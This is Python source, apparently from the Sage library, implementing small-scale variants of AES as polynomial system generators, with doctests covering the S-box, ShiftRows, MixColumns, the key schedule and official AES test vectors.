r"""
Return a small scale variant of the AES polynomial system
constructor subject to the following conditions:
INPUT:
- ``n`` - the number of rounds (default: 1)
- ``r`` - the number of rows in the state array (default: 1)
- ``c`` - the number of columns in the state array (default: 1)
- ``e`` - the exponent of the finite extension field (default: 4)
- ``star`` - determines if SR\* or SR should be constructed (default: ``False``)
- ``aes_mode`` - as the SR key schedule specification differs
slightly from the AES key schedule, this parameter controls
which schedule to use (default: ``True``)
- ``gf2`` - generate polynomial systems over `\GF{2}` rather than
over `\GF{2^e}` (default: ``False``)
- ``polybori`` - use the ``BooleanPolynomialRing`` as polynomial
representation (default: ``True``, `\GF{2}` only)
- ``order`` - a string to specify the term ordering of the
variables (default: ``deglex``)
- ``postfix`` - a string which is appended after the variable name
(default: '')
- ``allow_zero_inversions`` - a boolean to control whether zero
inversions raise an exception (default: ``False``)
- ``correct_only`` - only include correct inversion polynomials
(default: ``False``, `\GF{2}` only)
- ``biaffine_only`` - only include bilinear and biaffine inversion
polynomials (default: ``True``, `\GF{2}` only)
EXAMPLES::
sage: sr = mq.SR(1, 1, 1, 4)
sage: ShiftRows = sr.shift_rows_matrix()
sage: MixColumns = sr.mix_columns_matrix()
sage: Lin = sr.lin_matrix()
sage: M = MixColumns * ShiftRows * Lin
sage: print(sr.hex_str_matrix(M))
5 1 C 5
2 2 1 F
A 4 4 1
1 8 3 3
::
sage: sr = mq.SR(1, 2, 1, 4)
sage: ShiftRows = sr.shift_rows_matrix()
sage: MixColumns = sr.mix_columns_matrix()
sage: Lin = sr.lin_matrix()
sage: M = MixColumns * ShiftRows * Lin
sage: print(sr.hex_str_matrix(M))
F 3 7 F A 2 B A
A A 5 6 8 8 4 9
7 8 8 2 D C C 3
4 6 C C 5 E F F
A 2 B A F 3 7 F
8 8 4 9 A A 5 6
D C C 3 7 8 8 2
5 E F F 4 6 C C
::
sage: sr = mq.SR(1, 2, 2, 4)
sage: ShiftRows = sr.shift_rows_matrix()
sage: MixColumns = sr.mix_columns_matrix()
sage: Lin = sr.lin_matrix()
sage: M = MixColumns * ShiftRows * Lin
sage: print(sr.hex_str_matrix(M))
F 3 7 F 0 0 0 0 0 0 0 0 A 2 B A
A A 5 6 0 0 0 0 0 0 0 0 8 8 4 9
7 8 8 2 0 0 0 0 0 0 0 0 D C C 3
4 6 C C 0 0 0 0 0 0 0 0 5 E F F
A 2 B A 0 0 0 0 0 0 0 0 F 3 7 F
8 8 4 9 0 0 0 0 0 0 0 0 A A 5 6
D C C 3 0 0 0 0 0 0 0 0 7 8 8 2
5 E F F 0 0 0 0 0 0 0 0 4 6 C C
0 0 0 0 A 2 B A F 3 7 F 0 0 0 0
0 0 0 0 8 8 4 9 A A 5 6 0 0 0 0
0 0 0 0 D C C 3 7 8 8 2 0 0 0 0
0 0 0 0 5 E F F 4 6 C C 0 0 0 0
0 0 0 0 F 3 7 F A 2 B A 0 0 0 0
0 0 0 0 A A 5 6 8 8 4 9 0 0 0 0
0 0 0 0 7 8 8 2 D C C 3 0 0 0 0
0 0 0 0 4 6 C C 5 E F F 0 0 0 0
"""
if not kwargs.get("gf2", False):
return SR_gf2n(n, r, c, e, star, **kwargs)
else:
return SR_gf2(n, r, c, e, star, **kwargs)
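# Hedged illustrative sketch (added example, not part of Sage): ``SR_generic.sub_byte``
# below builds the small scale S-box for ``e == 4`` as inversion in GF(2^4) with
# modulus x^4 + x + 1, followed by the GF(2)-linear map L and addition of the
# constant 6 = a^2 + a. The plain-Python helper here reproduces that construction on
# integer representations; it should return
# [6, 11, 5, 4, 2, 14, 7, 10, 9, 13, 15, 12, 3, 1, 0, 8], matching the ``sbox()`` doctest.
def _sbox4_table_sketch():
    mod = 0b10011  # x^4 + x + 1
    def mul(x, y):
        r = 0
        while y:
            if y & 1:
                r ^= x
            y >>= 1
            x <<= 1
            if x & 0b10000:
                x ^= mod
        return r
    def inv(x):
        # x^(2^4 - 2) = x^14 inverts any nonzero x
        r = 1
        for _ in range(14):
            r = mul(r, x)
        return r
    L = [[1, 1, 1, 0], [0, 1, 1, 1], [1, 0, 1, 1], [1, 1, 0, 1]]
    table = []
    for b in range(16):
        if b == 0:
            table.append(0x6)  # zero skips inversion and maps straight to the S-box constant
            continue
        v = inv(b)
        bits = [(v >> j) & 1 for j in range(4)]  # coefficients of 1, a, a^2, a^3
        out = sum((sum(L[i][j] & bits[j] for j in range(4)) & 1) << i for i in range(4))
        table.append(out ^ 0x6)
    return table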
class SR_generic(MPolynomialSystemGenerator):
def __init__(self, n=1, r=1, c=1, e=4, star=False, **kwargs):
"""
Small Scale Variants of the AES.
EXAMPLES::
sage: sr = mq.SR(1, 1, 1, 4)
sage: ShiftRows = sr.shift_rows_matrix()
sage: MixColumns = sr.mix_columns_matrix()
sage: Lin = sr.lin_matrix()
sage: M = MixColumns * ShiftRows * Lin
sage: print(sr.hex_str_matrix(M))
5 1 C 5
2 2 1 F
A 4 4 1
1 8 3 3
"""
if n-1 not in range(10):
raise TypeError("n must be between 1 and 10 (inclusive)")
self._n = n
if r not in (1, 2, 4):
raise TypeError("r must be in (1, 2, 4)")
self._r = r
if c not in (1, 2, 4):
raise TypeError("c must be in (1, 2, 4)")
self._c = c
if e not in (4, 8):
raise TypeError("e must be either 4 or 8")
self._e = e
self._star = bool(star)
self._base = self.base_ring()
self._postfix = kwargs.get("postfix", "")
self._order = kwargs.get("order", "deglex")
self._aes_mode = kwargs.get("aes_mode", True)
self._gf2 = kwargs.get("gf2", False)
self._allow_zero_inversions = bool(kwargs.get("allow_zero_inversions", False))
self._reverse_variables = bool(kwargs.get("reverse_variables", True))
with AllowZeroInversionsContext(self):
sub_byte_lookup = dict([(e, self.sub_byte(e)) for e in self._base])
self._sub_byte_lookup = sub_byte_lookup
if self._gf2:
self._polybori = kwargs.get("polybori", True)
def new_generator(self, **kwds):
r"""
Return a new ``SR`` instance equal to this instance
except for the parameters passed explicitly to this function.
INPUT:
- ``**kwds`` - see the ``SR`` constructor for accepted
parameters
EXAMPLES::
sage: sr = mq.SR(2,1,1,4); sr
SR(2,1,1,4)
sage: sr.ring().base_ring()
Finite Field in a of size 2^4
::
sage: sr2 = sr.new_generator(gf2=True); sr2
SR(2,1,1,4)
sage: sr2.ring().base_ring()
Finite Field of size 2
sage: sr3 = sr2.new_generator(correct_only=True)
sage: len(sr2.inversion_polynomials_single_sbox())
20
sage: len(sr3.inversion_polynomials_single_sbox())
19
"""
kwds.setdefault("n", self._n)
kwds.setdefault("r", self._r)
kwds.setdefault("c", self._c)
kwds.setdefault("e", self._e)
kwds.setdefault("star", self._star)
kwds.setdefault("postfix", self._postfix)
kwds.setdefault("order", self._order)
kwds.setdefault("allow_zero_inversions", self._allow_zero_inversions)
kwds.setdefault("aes_mode", self._aes_mode)
kwds.setdefault("gf2", self._gf2)
kwds.setdefault("reverse_variables", self._reverse_variables)
try:
polybori = self._polybori
except AttributeError:
polybori = False
kwds.setdefault("polybori", polybori)
try:
correct_only = self._correct_only
except AttributeError:
correct_only = False
kwds.setdefault("correct_only", correct_only)
try:
biaffine_only = self._biaffine_only
except AttributeError:
biaffine_only = False
kwds.setdefault("biaffine_only", biaffine_only)
if self._gf2 == kwds.get('gf2'):
return self.__class__(**kwds)
else:
return SR(**kwds)
def __getattr__(self, attr):
"""
EXAMPLES::
sage: sr = mq.SR(1, 2, 1, 4, gf2=True)
sage: sr.Mstar
[1 0 1 1 0 0 0 0]
[1 1 0 1 0 0 0 0]
[1 1 1 0 0 0 0 0]
[0 1 1 1 0 0 0 0]
[0 0 0 0 1 0 1 1]
[0 0 0 0 1 1 0 1]
[0 0 0 0 1 1 1 0]
[0 0 0 0 0 1 1 1]
"""
if attr == "e":
return self._e
elif attr == "c":
return self._c
elif attr == "n":
return self._n
elif attr == "r":
return self._r
elif attr == "R":
self.R = self.ring()
return self.R
elif attr == "k":
self.k = self.base_ring()
return self.k
elif attr == "Lin":
self.Lin = self.lin_matrix()
return self.Lin
elif attr == "ShiftRows":
self.ShiftRows = self.shift_rows_matrix()
return self.ShiftRows
elif attr == "MixColumns":
self.MixColumns = self.mix_columns_matrix()
return self.MixColumns
elif attr == "M":
self.M = self.MixColumns * self.ShiftRows * self.Lin
return self.M
elif attr == "Mstar":
self.Mstar = self.ShiftRows * self.Lin
return self.Mstar
raise AttributeError("%s has no attribute %s"%(type(self), attr))
def _repr_(self):
"""
EXAMPLES::
sage: sr = mq.SR(1, 2, 2, 4); sr #indirect doctest
SR(1,2,2,4)
sage: sr = mq.SR(1, 2, 2, 4, star=True); sr
SR*(1,2,2,4)
"""
if self._star:
return "SR*(%d,%d,%d,%d)"%(self._n, self._r, self._c, self._e)
else:
return "SR(%d,%d,%d,%d)"%(self._n, self._r, self._c, self._e)
def base_ring(self):
r"""
Return the base field of self as determined by
``self.e``.
EXAMPLES::
sage: sr = mq.SR(10, 2, 2, 4)
sage: sr.base_ring().polynomial()
a^4 + a + 1
The Rijndael polynomial::
sage: sr = mq.SR(10, 4, 4, 8)
sage: sr.base_ring().polynomial()
a^8 + a^4 + a^3 + a + 1
"""
try:
return self._base
except AttributeError:
if self._e == 4:
self._base = GF(2**4, 'a', modulus=(1, 1, 0, 0, 1))
elif self._e == 8:
self._base = GF(2**8, 'a', modulus=(1, 1, 0, 1, 1, 0, 0, 0, 1))
return self._base
def __cmp__(self, other):
"""
Two generators are considered equal if they agree on all parameters
passed to them during construction.
EXAMPLES::
sage: sr1 = mq.SR(2, 2, 2, 4)
sage: sr2 = mq.SR(2, 2, 2, 4)
sage: sr1 == sr2
True
::
sage: sr1 = mq.SR(2, 2, 2, 4)
sage: sr2 = mq.SR(2, 2, 2, 4, gf2=True)
sage: sr1 == sr2
False
"""
for name in ['n', 'r', 'c', 'e', '_postfix', '_order',
'_allow_zero_inversions', '_aes_mode', '_gf2', '_star']:
lx = getattr(self, name)
rx = getattr(other, name)
if lx != rx:
return 1 if richcmp_not_equal(lx, rx, op_LT) else -1
return 0
def sub_bytes(self, d):
r"""
Perform the non-linear transform on ``d``.
INPUT:
- ``d`` - state array or something coercible to a state array
EXAMPLES::
sage: sr = mq.SR(2, 1, 2, 8, gf2=True)
sage: k = sr.base_ring()
sage: A = Matrix(k, 1, 2 , [k(1), k.gen()])
sage: sr.sub_bytes(A)
[ a^6 + a^5 + a^4 + a^3 + a^2 a^6 + a^5 + a^4 + a^2 + a + 1]
"""
d = self.state_array(d)
return Matrix(self.base_ring(), d.nrows(), d.ncols(), [self.sub_byte(b) for b in d.list()])
def sub_byte(self, b):
r"""
Perform ``SubByte`` on a single byte/halfbyte ``b``.
        A ``ZeroDivisionError`` is raised if an attempt is made
        to perform an inversion on the zero element. This can be
        disabled by passing ``allow_zero_inversions=True`` to the
        constructor. A zero inversion can result in an inconsistent
equation system.
INPUT:
- ``b`` - an element in ``self.base_ring()``
EXAMPLES:
The S-Box table for `\GF{2^4}`::
sage: sr = mq.SR(1, 1, 1, 4, allow_zero_inversions=True)
sage: for e in sr.base_ring():
....: print('% 20s % 20s'%(e, sr.sub_byte(e)))
0 a^2 + a
a a^2 + 1
a^2 a
a^3 a^3 + 1
a + 1 a^2
a^2 + a a^2 + a + 1
a^3 + a^2 a + 1
a^3 + a + 1 a^3 + a^2
a^2 + 1 a^3 + a^2 + a
a^3 + a a^3 + a^2 + a + 1
a^2 + a + 1 a^3 + a
a^3 + a^2 + a 0
a^3 + a^2 + a + 1 a^3
a^3 + a^2 + 1 1
a^3 + 1 a^3 + a^2 + 1
1 a^3 + a + 1
"""
if not b:
if not self._allow_zero_inversions:
raise ZeroDivisionError("A zero inversion occurred during an encryption or key schedule.")
else:
return self.sbox_constant()
try:
return self._sub_byte_lookup[b]
except AttributeError:
e = self.e
k = self.k
# inversion
b = b ** ( 2**e - 2 )
# GF(2) linear map
if e == 4:
if not hasattr(self, "_L"):
self._L = Matrix(GF(2), 4, 4, [[1, 1, 1, 0],
[0, 1, 1, 1],
[1, 0, 1, 1],
[1, 1, 0, 1]])
elif e==8:
if not hasattr(self, "_L"):
self._L = Matrix(GF(2), 8, 8, [[1, 0, 0, 0, 1, 1, 1, 1],
[1, 1, 0, 0, 0, 1, 1, 1],
[1, 1, 1, 0, 0, 0, 1, 1],
[1, 1, 1, 1, 0, 0, 0, 1],
[1, 1, 1, 1, 1, 0, 0, 0],
[0, 1, 1, 1, 1, 1, 0, 0],
[0, 0, 1, 1, 1, 1, 1, 0],
[0, 0, 0, 1, 1, 1, 1, 1]])
b = k(self._L * b._vector_())
# constant addition
if e == 4:
b = b + k.fetch_int(6)
elif e == 8:
b = b + k.fetch_int(99)
return b
def sbox_constant(self):
"""
Return the S-Box constant which is added after `L(x^{-1})` was
performed. That is ``0x63`` if ``e == 8`` or ``0x6`` if ``e ==
4``.
EXAMPLES::
sage: sr = mq.SR(10, 1, 1, 8)
sage: sr.sbox_constant()
a^6 + a^5 + a + 1
"""
k = self.k
if self.e == 4:
return k.fetch_int(6)
elif self.e == 8:
return k.fetch_int(99)
else:
raise TypeError("sbox constant only defined for e in (4, 8)")
def sbox(self, inversion_only=False):
r"""
Return an S-Box object for this SR instance.
INPUT:
- ``inversion_only`` - do not include the `\GF{2}` affine map when
computing the S-Box (default: ``False``)
EXAMPLES::
sage: sr = mq.SR(1,2,2,4, allow_zero_inversions=True)
sage: S = sr.sbox(); S
(6, 11, 5, 4, 2, 14, 7, 10, 9, 13, 15, 12, 3, 1, 0, 8)
sage: sr.sub_byte(0)
a^2 + a
sage: sage_eval(str(sr.sub_byte(0)), {'a':2})
6
sage: S(0)
6
sage: sr.sub_byte(1)
a^3 + a + 1
sage: sage_eval(str(sr.sub_byte(1)), {'a':2})
11
sage: S(1)
11
sage: sr = mq.SR(1,2,2,8, allow_zero_inversions=True)
sage: S = sr.sbox(); S
(99, 124, 119, 123, 242, 107, 111, 197, 48, 1, 103, 43,
254, 215, 171, 118, 202, 130, 201, 125, 250, 89, 71, 240,
173, 212, 162, 175, 156, 164, 114, 192, 183, 253, 147, 38,
54, 63, 247, 204, 52, 165, 229, 241, 113, 216, 49, 21, 4,
199, 35, 195, 24, 150, 5, 154, 7, 18, 128, 226, 235, 39,
178, 117, 9, 131, 44, 26, 27, 110, 90, 160, 82, 59, 214,
179, 41, 227, 47, 132, 83, 209, 0, 237, 32, 252, 177, 91,
106, 203, 190, 57, 74, 76, 88, 207, 208, 239, 170, 251,
67, 77, 51, 133, 69, 249, 2, 127, 80, 60, 159, 168, 81,
163, 64, 143, 146, 157, 56, 245, 188, 182, 218, 33, 16,
255, 243, 210, 205, 12, 19, 236, 95, 151, 68, 23, 196,
167, 126, 61, 100, 93, 25, 115, 96, 129, 79, 220, 34, 42,
144, 136, 70, 238, 184, 20, 222, 94, 11, 219, 224, 50, 58,
10, 73, 6, 36, 92, 194, 211, 172, 98, 145, 149, 228, 121,
231, 200, 55, 109, 141, 213, 78, 169, 108, 86, 244, 234,
101, 122, 174, 8, 186, 120, 37, 46, 28, 166, 180, 198,
232, 221, 116, 31, 75, 189, 139, 138, 112, 62, 181, 102,
72, 3, 246, 14, 97, 53, 87, 185, 134, 193, 29, 158, 225,
248, 152, 17, 105, 217, 142, 148, 155, 30, 135, 233, 206,
85, 40, 223, 140, 161, 137, 13, 191, 230, 66, 104, 65,
153, 45, 15, 176, 84, 187, 22)
sage: sr.sub_byte(0)
a^6 + a^5 + a + 1
sage: sage_eval(str(sr.sub_byte(0)), {'a':2})
99
sage: S(0)
99
sage: sr.sub_byte(1)
a^6 + a^5 + a^4 + a^3 + a^2
sage: sage_eval(str(sr.sub_byte(1)), {'a':2})
124
sage: S(1)
124
sage: sr = mq.SR(1,2,2,4, allow_zero_inversions=True)
sage: S = sr.sbox(inversion_only=True); S
(0, 1, 9, 14, 13, 11, 7, 6, 15, 2, 12, 5, 10, 4, 3, 8)
sage: S(0)
0
sage: S(1)
1
sage: S(sr.k.gen())
a^3 + 1
"""
from sage.crypto.sbox import SBox
k = self.base_ring()
if not inversion_only:
with AllowZeroInversionsContext(self):
S = [self.sub_byte(elem) for elem in sorted(k)]
return SBox(S)
else:
e = self.e
S = [elem ** (2**e - 2) for elem in sorted(k)]
return SBox(S)
def shift_rows(self, d):
r"""
Perform the ``ShiftRows`` operation on ``d``.
INPUT:
- ``d`` - state array or something coercible to a state array
EXAMPLES::
sage: sr = mq.SR(10, 4, 4, 4)
sage: E = sr.state_array() + 1; E
[1 0 0 0]
[0 1 0 0]
[0 0 1 0]
[0 0 0 1]
::
sage: sr.shift_rows(E)
[1 0 0 0]
[1 0 0 0]
[1 0 0 0]
[1 0 0 0]
"""
d = self.state_array(d)
ret = []
for i in range(d.nrows()):
ret += list(d.row(i)[i%d.ncols():]) + list(d.row(i)[:i%d.ncols()])
return Matrix(self.base_ring(), self._r, self._c, ret)
def mix_columns(self, d):
r"""
Perform the ``MixColumns`` operation on
``d``.
INPUT:
- ``d`` - state array or something coercible to a
state array
EXAMPLES::
sage: sr = mq.SR(10, 4, 4, 4)
sage: E = sr.state_array() + 1; E
[1 0 0 0]
[0 1 0 0]
[0 0 1 0]
[0 0 0 1]
::
sage: sr.mix_columns(E)
[ a a + 1 1 1]
[ 1 a a + 1 1]
[ 1 1 a a + 1]
[a + 1 1 1 a]
"""
d = self.state_array(d)
k = self.base_ring()
a = k.gen()
r = self._r
if r == 1:
M = Matrix(self.base_ring(), 1, 1, [[1]])
elif r == 2:
M = Matrix(self.base_ring(), 2, 2, [[a + 1, a],
[a, a + 1]])
elif r == 4:
M = Matrix(self.base_ring(), 4, 4, [[a, a+1, 1, 1],
[1, a, a+1, 1],
[1, 1, a, a+1],
[a+1, 1, 1, a]])
ret =[]
for column in d.columns():
ret.append(M * column)
# AES uses the column major ordering
return Matrix(k, d.ncols(), d.nrows(), ret).transpose()
def add_round_key(self, d, key):
r"""
Perform the ``AddRoundKey`` operation on
``d`` using ``key``.
INPUT:
- ``d`` - state array or something coercible to a
state array
- ``key`` - state array or something coercible to a
state array
EXAMPLES::
sage: sr = mq.SR(10, 4, 4, 4)
sage: D = sr.random_state_array()
sage: K = sr.random_state_array()
sage: sr.add_round_key(D, K) == K + D
True
"""
d = self.state_array(d)
key = self.state_array(key)
return d+key
def state_array(self, d=None):
"""
Convert the parameter to a state array.
INPUT:
- ``d`` - a matrix, a list, or a tuple (default: ``None``)
EXAMPLES::
sage: sr = mq.SR(2, 2, 2, 4)
sage: k = sr.base_ring()
sage: e1 = [k.fetch_int(e) for e in range(2*2)]; e1
[0, 1, a, a + 1]
sage: e2 = sr.phi( Matrix(k, 2*2, 1, e1) )
sage: sr.state_array(e1) # note the column major ordering
[ 0 a]
[ 1 a + 1]
sage: sr.state_array(e2)
[ 0 a]
[ 1 a + 1]
::
sage: sr.state_array()
[0 0]
[0 0]
"""
r = self.r
c = self.c
e = self.e
k = self.base_ring()
if d is None:
return Matrix(k, r, c)
if is_Matrix(d):
if d.nrows() == r*c*e:
return Matrix(k, c, r, self.antiphi(d).list()).transpose()
elif d.ncols() == c and d.nrows() == r and d.base_ring() == k:
return d
        if isinstance(d, (list, tuple)):
return Matrix(k, c, r, d).transpose()
def is_state_array(self, d):
"""
Return ``True`` if ``d`` is a state array, i.e. has the correct
dimensions and base field.
EXAMPLES::
sage: sr = mq.SR(2, 2, 4, 8)
sage: k = sr.base_ring()
sage: sr.is_state_array( matrix(k, 2, 4) )
True
::
sage: sr = mq.SR(2, 2, 4, 8)
sage: k = sr.base_ring()
sage: sr.is_state_array( matrix(k, 4, 4) )
False
"""
return is_Matrix(d) and \
d.nrows() == self.r and \
d.ncols() == self.c and \
d.base_ring() == self.base_ring()
def random_state_array(self, *args, **kwds):
r"""
Return a random element in ``MatrixSpace(self.base_ring(),
self.r, self.c)``.
EXAMPLES::
sage: sr = mq.SR(2, 2, 2, 4)
sage: sr.random_state_array()
[ a^2 a^3 + a + 1]
[a^3 + a^2 + a + 1 a + 1]
"""
return random_matrix(self.base_ring(), self._r, self._c, *args, **kwds)
def random_vector(self, *args, **kwds):
"""
Return a random vector as it might appear in the algebraic
expression of self.
EXAMPLES::
sage: sr = mq.SR(2, 2, 2, 4)
sage: sr.random_vector()
[ a^2]
[ a + 1]
[ a^2 + 1]
[ a]
[a^3 + a^2 + a + 1]
[ a^3 + a]
[ a^3]
[ a^3 + a^2]
[ a^3 + a + 1]
[ a^3 + 1]
[ a^3 + a^2 + 1]
[ a^3 + a^2 + a]
[ a + 1]
[ a^2 + 1]
[ a]
[ a^2]
.. note::
`\phi` was already applied to the result.
"""
return self.vector(self.random_state_array(*args, **kwds))
def random_element(self, elem_type = "vector", *args, **kwds):
"""
Return a random element for self. Other arguments and keywords are
passed to random_* methods.
INPUT:
        - ``elem_type`` - either 'vector' or 'state_array'
(default: ``'vector'``)
EXAMPLES::
sage: sr = mq.SR()
sage: sr.random_element()
[ a^2]
[ a + 1]
[a^2 + 1]
[ a]
sage: sr.random_element('state_array')
[a^3 + a + 1]
Passes extra positional or keyword arguments through::
sage: sr.random_element(density=0)
[0]
[0]
[0]
[0]
"""
if elem_type == "vector":
return self.random_vector(*args, **kwds)
elif elem_type == "state_array":
return self.random_state_array(*args, **kwds)
else:
raise TypeError("parameter type not understood")
def key_schedule(self, kj, i):
"""
Return `k_i` for a given `i` and `k_j`
with `j = i-1`.
EXAMPLES::
sage: sr = mq.SR(10, 4, 4, 8, star=True, allow_zero_inversions=True)
sage: ki = sr.state_array()
sage: for i in range(10):
....: ki = sr.key_schedule(ki, i+1)
sage: print(sr.hex_str_matrix(ki))
B4 3E 23 6F
EF 92 E9 8F
5B E2 51 18
CB 11 CF 8E
"""
if i < 0:
            raise TypeError("i must be >= 0")
if i == 0:
return kj
r = self.r
c = self.c
F = self.base_ring()
a = F.gen()
SubByte = self.sub_byte
rc = Matrix(F, r, c, ([a**(i-1)] * c) + [F(0)]*((r-1)*c) )
ki = Matrix(F, r, c)
if r == 1:
s0 = SubByte(kj[0, c-1])
if c > 1:
for q in range(c):
ki[0, q] = s0 + sum([kj[0, t] for t in range(q+1) ])
else:
ki[0, 0] = s0
elif r == 2:
s0 = SubByte(kj[1, c-1])
s1 = SubByte(kj[0, c-1])
if c > 1:
for q in range(c):
ki[0, q] = s0 + sum([ kj[0, t] for t in range(q+1) ])
ki[1, q] = s1 + sum([ kj[1, t] for t in range(q+1) ])
else:
ki[0, 0] = s0
ki[1, 0] = s1
elif r == 4:
if self._aes_mode:
s0 = SubByte(kj[1, c-1])
s1 = SubByte(kj[2, c-1])
s2 = SubByte(kj[3, c-1])
s3 = SubByte(kj[0, c-1])
else:
s0 = SubByte(kj[3, c-1])
s1 = SubByte(kj[2, c-1])
s2 = SubByte(kj[1, c-1])
s3 = SubByte(kj[0, c-1])
if c > 1:
for q in range(c):
ki[0, q] = s0 + sum([ kj[0, t] for t in range(q+1) ])
ki[1, q] = s1 + sum([ kj[1, t] for t in range(q+1) ])
ki[2, q] = s2 + sum([ kj[2, t] for t in range(q+1) ])
ki[3, q] = s3 + sum([ kj[3, t] for t in range(q+1) ])
else:
ki[0, 0] = s0
ki[1, 0] = s1
ki[2, 0] = s2
ki[3, 0] = s3
ki += rc
return ki
def __call__(self, P, K):
r"""
Encrypts the plaintext `P` using the key `K`.
Both must be given as state arrays or coercible to state arrays.
INPUT:
- ``P`` - plaintext as state array or something coercible to a
          state array
- ``K`` - key as state array or something coercible to a state
array
TESTS:
The official AES test vectors::
sage: sr = mq.SR(10, 4, 4, 8, star=True, allow_zero_inversions=True)
sage: k = sr.base_ring()
sage: plaintext = sr.state_array([k.fetch_int(e) for e in range(16)])
sage: key = sr.state_array([k.fetch_int(e) for e in range(16)])
sage: print(sr.hex_str_matrix( sr(plaintext, key) ))
0A 41 F1 C6
94 6E C3 53
0B F0 94 EA
B5 45 58 5A
Brian Gladman's development vectors (dev_vec.txt)::
sage: sr = mq.SR(10, 4, 4, 8, star=True, allow_zero_inversions=True, aes_mode=True)
sage: k = sr.base_ring()
sage: plain = '3243f6a8885a308d313198a2e0370734'
sage: key = '2b7e151628aed2a6abf7158809cf4f3c'
sage: set_verbose(2)
sage: cipher = sr(plain, key)
R[01].start 193DE3BEA0F4E22B9AC68D2AE9F84808
R[01].s_box D42711AEE0BF98F1B8B45DE51E415230
R[01].s_row D4BF5D30E0B452AEB84111F11E2798E5
R[01].m_col 046681E5E0CB199A48F8D37A2806264C
R[01].k_sch A0FAFE1788542CB123A339392A6C7605
R[02].start A49C7FF2689F352B6B5BEA43026A5049
R[02].s_box 49DED28945DB96F17F39871A7702533B
R[02].s_row 49DB873B453953897F02D2F177DE961A
R[02].m_col 584DCAF11B4B5AACDBE7CAA81B6BB0E5
R[02].k_sch F2C295F27A96B9435935807A7359F67F
R[03].start AA8F5F0361DDE3EF82D24AD26832469A
R[03].s_box AC73CF7BEFC111DF13B5D6B545235AB8
R[03].s_row ACC1D6B8EFB55A7B1323CFDF457311B5
R[03].m_col 75EC0993200B633353C0CF7CBB25D0DC
R[03].k_sch 3D80477D4716FE3E1E237E446D7A883B
R[04].start 486C4EEE671D9D0D4DE3B138D65F58E7
R[04].s_box 52502F2885A45ED7E311C807F6CF6A94
R[04].s_row 52A4C89485116A28E3CF2FD7F6505E07
R[04].m_col 0FD6DAA9603138BF6FC0106B5EB31301
R[04].k_sch EF44A541A8525B7FB671253BDB0BAD00
R[05].start E0927FE8C86363C0D9B1355085B8BE01
R[05].s_box E14FD29BE8FBFBBA35C89653976CAE7C
R[05].s_row E1FB967CE8C8AE9B356CD2BA974FFB53
R[05].m_col 25D1A9ADBD11D168B63A338E4C4CC0B0
R[05].k_sch D4D1C6F87C839D87CAF2B8BC11F915BC
R[06].start F1006F55C1924CEF7CC88B325DB5D50C
R[06].s_box A163A8FC784F29DF10E83D234CD503FE
R[06].s_row A14F3DFE78E803FC10D5A8DF4C632923
R[06].m_col 4B868D6D2C4A8980339DF4E837D218D8
R[06].k_sch 6D88A37A110B3EFDDBF98641CA0093FD
R[07].start 260E2E173D41B77DE86472A9FDD28B25
R[07].s_box F7AB31F02783A9FF9B4340D354B53D3F
R[07].s_row F783403F27433DF09BB531FF54ABA9D3
R[07].m_col 1415B5BF461615EC274656D7342AD843
R[07].k_sch 4E54F70E5F5FC9F384A64FB24EA6DC4F
R[08].start 5A4142B11949DC1FA3E019657A8C040C
R[08].s_box BE832CC8D43B86C00AE1D44DDA64F2FE
R[08].s_row BE3BD4FED4E1F2C80A642CC0DA83864D
R[08].m_col 00512FD1B1C889FF54766DCDFA1B99EA
R[08].k_sch EAD27321B58DBAD2312BF5607F8D292F
R[09].start EA835CF00445332D655D98AD8596B0C5
R[09].s_box 87EC4A8CF26EC3D84D4C46959790E7A6
R[09].s_row 876E46A6F24CE78C4D904AD897ECC395
R[09].m_col 473794ED40D4E4A5A3703AA64C9F42BC
R[09].k_sch AC7766F319FADC2128D12941575C006E
R[10].s_box E9098972CB31075F3D327D94AF2E2CB5
R[10].s_row E9317DB5CB322C723D2E895FAF090794
R[10].k_sch D014F9A8C9EE2589E13F0CC8B6630CA6
R[10].output 3925841D02DC09FBDC118597196A0B32
sage: set_verbose(0)
"""
r,c,e = self.r,self.c,self.e
F = self.base_ring()
_type = self.state_array
if isinstance(P, str):
P = self.state_array([F.fetch_int(ZZ(P[i:i+2], 16)) for i in range(0, len(P), 2)])
if isinstance(K, str):
K = self.state_array([F.fetch_int(ZZ(K[i:i+2], 16)) for i in range(0, len(K), 2)])
if self.is_state_array(P) and self.is_state_array(K):
_type = self.state_array
elif self.is_vector(P) and self.is_vector(K):
_type = self.vector
elif isinstance(P, (list,tuple)) and isinstance(K, (list,tuple)):
if len(P) == len(K) == r*c:
_type = self.state_array
elif len(P) == len(K) == r*c*e:
_type = self.vector
else:
raise TypeError("length %d or %d doesn't match either %d or %d"%(len(P),len(K),r*c,r*c*e))
else:
raise TypeError("plaintext or key parameter not understood")
P = self.state_array(P)
K = self.state_array(K)
AddRoundKey = self.add_round_key
SubBytes = self.sub_bytes
MixColumns = self.mix_columns
ShiftRows = self.shift_rows
KeyExpansion = self.key_schedule
P = AddRoundKey(P, K)
for r in range(self._n-1):
if get_verbose() >= 2:
print("R[%02d].start %s"%(r+1, self.hex_str_vector(P)))
P = SubBytes(P)
if get_verbose() >= 2:
print("R[%02d].s_box %s"%(r+1, self.hex_str_vector(P)))
P = ShiftRows(P)
if get_verbose() >= 2:
print("R[%02d].s_row %s"%(r+1, self.hex_str_vector(P)))
P = MixColumns(P)
if get_verbose() >= 2:
print("R[%02d].m_col %s"%(r+1, self.hex_str_vector(P)))
K = KeyExpansion(K, r+1)
if get_verbose() >= 2:
print("R[%02d].k_sch %s"%(r+1, self.hex_str_vector(K)))
P = AddRoundKey(P, K)
P = SubBytes(P)
if get_verbose() >= 2:
print("R[%02d].s_box %s"%(self.n, self.hex_str_vector(P)))
P = ShiftRows(P)
if get_verbose() >= 2:
print("R[%02d].s_row %s"%(self.n, self.hex_str_vector(P)))
if not self._star:
P = MixColumns(P)
if get_verbose() >= 2:
print("R[%02d].m_col %s"%(self.n, self.hex_str_vector(P)))
K = KeyExpansion(K, self._n)
if get_verbose() >= 2:
print("R[%02d].k_sch %s"%(self.n, self.hex_str_vector(K)))
P = AddRoundKey(P, K)
if get_verbose() >= 2:
print("R[%02d].output %s"%(self.n, self.hex_str_vector(P)))
return _type(P)
def hex_str(self, M, typ="matrix"):
r"""
Return a hex string for the provided AES state array/matrix.
INPUT:
- ``M`` - state array
- ``typ`` - controls what to return, either 'matrix'
or 'vector' (default: ``'matrix'``)
EXAMPLES::
sage: sr = mq.SR(2, 2, 2, 4)
sage: k = sr.base_ring()
sage: A = matrix(k, 2, 2, [1, k.gen(), 0, k.gen()^2])
sage: sr.hex_str(A)
' 1 2 \n 0 4 \n'
::
